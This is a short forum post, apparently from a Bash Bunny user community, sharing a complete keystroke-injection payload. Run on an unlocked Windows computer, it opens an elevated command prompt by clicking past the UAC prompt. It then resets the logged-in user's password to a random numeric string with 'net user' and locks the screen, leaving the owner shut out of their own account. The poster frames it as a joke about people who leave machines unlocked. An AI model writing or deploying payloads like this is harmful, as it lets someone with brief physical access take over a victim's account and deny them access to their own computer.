jblk01 Posted May 28, 2019 Share Posted May 28, 2019 I was bored earlier today and whipped this thing out, it sets the current users password to a random numeric string then locks the screen. ATTACKMODE HID # They don't lock their system(s)? Let's do it for them. :) # Plz improve this. LED SPECIAL5 Q GUI Q DELAY 500 Q STRING cmd Q DELAY 500 Q CTRL-SHIFT ENTER Q DELAY 500 Q LEFTARROW Q DELAY 500 Q ENTER Q STRING 'net user %username% %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%' Q ENTER Q STRING exit Q ENTER Q GUI l LED CLEANUP 1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.